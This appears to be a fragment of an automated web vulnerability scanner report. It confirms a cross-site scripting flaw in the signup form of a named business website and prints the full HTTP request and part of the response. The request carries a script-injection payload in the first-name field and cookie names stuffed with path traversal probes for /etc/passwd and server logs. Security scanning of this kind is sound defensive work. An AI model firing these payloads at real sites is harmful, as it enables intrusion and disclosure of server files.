Date: Wed, 20 Apr 2011 02:42:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=59611EAFC34F45C8464E9BE6AB493BB0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001375)</script>
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 308
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001375)%3c%2fscript%3e&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:22 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=E20EF2B25C68D5A7558B71CFDF3D25DA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
